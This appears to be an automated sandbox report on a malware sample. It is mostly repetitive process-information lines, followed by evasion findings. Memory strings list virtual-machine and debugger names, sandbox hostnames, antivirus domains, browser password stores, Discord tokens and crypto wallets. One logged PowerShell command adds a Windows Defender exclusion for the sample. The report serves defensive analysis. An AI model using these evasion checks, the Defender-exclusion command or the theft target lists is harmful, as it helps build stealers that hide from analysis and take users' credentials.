                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: OutputDebugStringW count: 1943
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6792
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2689
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7093
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2465
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4020
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 823
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep count: 6792 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 2689 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep count: 7093 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep count: 2465 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 4020 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 823 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile Volume queried: \Device\CdRom0\ FullSizeInformation
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1523848906.00000267B0C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Handshakemath/randClassINETAuthorityquestionsinfo_hashuser32.dllvmwaretrayxenservicevmwareusermegadumperscyllahidevirtualboxPxmdUOpVyxQ9IATRKPRHPaul Jonesd1bnJkfVlHQarZhrdBpjPC-DANIELEqarzhrdbpjq9iatrkprhd1bnjkfvlhJUDES-DOJOGJAm1NxXVmdOuyo8RV7105KvAUQKPQOf20XqH4VLpxmduopvyxJcOtj17dZxcM0uEGN4do64F2tKIqO5GexwjQdjXGfNBDSlDTXYmcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootlogins.txtLogin DataChrome SxS360BrowserUR BrowserdiscordptbinitiationByHackirbysecure.datauto_startsteam-tempEpic Games.minecraftRiot GamesShowWindow-NoProfileExtensionsExodusWeb3PaliWalletwinsymlink/dev/stdinCreateFileterminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dllexecerrdotSYSTEMROOTavatar_url
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: tznamerdtscppopcntempty rune1 RGBA64Gray16X25519%w%.0wAcceptServercmd/goheaderAnswerLengthSTREETavx512rdrandrdseedwebhookcryptosregeditollydbgdf5servvmusrvctaskmgrqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe pro3u2v9m8SERVER1MIKE-PCNETTYPClisa-pcHEUeRzljohn-pcZELJAVALISA-PCWILEYPCJOHN-PCserver1wileypcAIDANPC7DBgdxuJAW4Dz0cMkNdS6Mr.Nonej7pNjWMequZE3Jo6jdigqKUv3bT4ymONofgheuerzlIVwoKUFavg.comDefaultFirefoxMercuryAddressNetworkCookiesHistorykey4.dbThoriumIridiumVivaldiOrbitumMaxthonK-MelonSputnikSlimjetOperaGXaccountaddressDesktopcontentAppDatadiscordmodulesRoamingversionWindowsFeatherBadlionleveldbAPPDATACaption%.2f GBprofileDiscord`Nitro`.sqlitecmd.exeWallets\ArmoryCoinomiBinanceMartianPhantomSafepalSolfareiWalletLICENSEProtectfloat32float64readdirconsoleabortedCopySidWSARecvWSASendconnectsignal runningPATHEXT_pragmapragma _txlocknumber nil keyUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT19531259765625FreeSidSleepExinvaliduintptrSwapperChanDir Value>Convert\\.\UNCforcegcallocmWcpuprofallocmRunknowngctraceIO waitsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: OpenEventAUnlockFileunrechableno consoleenter-fastRIPEMD-160impossible[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]rune <nil>image: NewBM????res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type TuesdayJanuaryOctoberMUI_StdMUI_DltAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutapdh.dllwindowswsarecvwsasendlookup writetoavx512fSHA-224SHA-256SHA-384SHA-512InstAltInstNopalt -> nop -> any -> NRGBA64tls3desderivedInitialExpiresSubjectcharsetos/execruntimeanswers]?)(.*)Ed25519MD5-RSAserial:eae_prk2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavevmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversalUSERNAMEEIEEIFYEGBQHURCCORXGKKZCoreleepcJBYQTQBOMARCI-PClmVwjj9bGRXNNIIELUCAS-PCjulia-pcXGNSVODUESPNHOOLORELEEPCVONRAHELTMKNGOMUJULIA-PC05h00Gi05ISYH9SHICQja5iTQZSBJVWMUspG1y1CecVtZ5wEBUiA1hkmOZFUCOD6o8yTi52Th7dk1xPrQORxJKNkgL50ksOpSqgFOf3Gj.seancedxd8DJ7clmvwjj9beset.com-CommandDisabled0.0.0.0 Web DataWaterfoxK-MeleonCyberfoxBlackHawUsernamePasswordBrowsers```%s```ChromiumElementsCatalinaQIP SurfpasswordbancairemetamaskdatabasePicturesOneDriveindex.jsSettingssettings.featherNovolinealts.txtPaladiumgames-%s
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparsesse41sse42ssse3SHA-1matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1618739153.000001542894B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe
